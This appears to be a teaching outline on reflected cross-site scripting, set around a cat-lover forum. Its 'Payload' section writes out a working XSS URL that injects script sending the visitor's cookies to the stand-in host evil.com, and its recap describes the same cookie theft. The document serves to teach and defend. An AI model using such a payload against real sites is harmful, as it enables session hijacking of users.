Main Content
Ep-4: What is XSS
Table Of Contents
Scope
- Questions to be answered
- What is Reflected XSS (Cross-Site Scripting)?
- How does Reflected XSS compare to other types of XSS?
- What does a Reflected XSS payload look like?
- 80/20 Analysis
Reflected XSS Ex: Scenario
- Explore definition through example
- Scenario
- Website forum for cat lovers
- User just clicked on a link to show all cat photos on site
Reflected XSS Ex: Search Results View
- Browser Request
Server Response
- Problems?
- Alert: User submitted input is reflected into the response
- Reflected XSS
- "But wait, how is this untrusted?!"
- We'll explore this soon
- Alert: User submitted input is reflected into the response
Reflected XSS Ex: Back-end Code
Portion of Server-side Template
- Alert
- User input isn't validated against a whitelist
- Using string concatenation with user input
Reflected XSS Ex: Payload
Url View with payload
http://cats.example.com?search='><script>document.location='http://evil.com/receiver?cookie='+document.cookie</script>Server-side Template View
HTML View
Reflected XSS Ex: Payload Eval Order
- Eval order
- document.cookie
- A string containing a semicolon-separated list of all cookies (i.e. key=value pairs)
- document.location
- Redirection logic
- evil.com can view submitted cookie string
- document.cookie
Reflected XSS Ex: Live Ex
Reflected XSS Summation
- Process recap
- A victim clicks on a link with the payload
- trusted.example.com/PAYLOADHERE
- The payload goes to trusted.example.com
- The payload is embedded in the response
- The payload is reflected back to the user
- Malicious javascript sends
trusted.example.com's cookies toevil.example.com
- A victim clicks on a link with the payload
- Attack vectors
- Payload at the end of a long link
- When previewing a link, only first x characters are easily viewable
- Link shortener
- Payload at the end of a long link
XSS Types
- Persistent
- Stored XSS
- Non-Persistent
- Reflected XSS
- DOM XSS
0 comments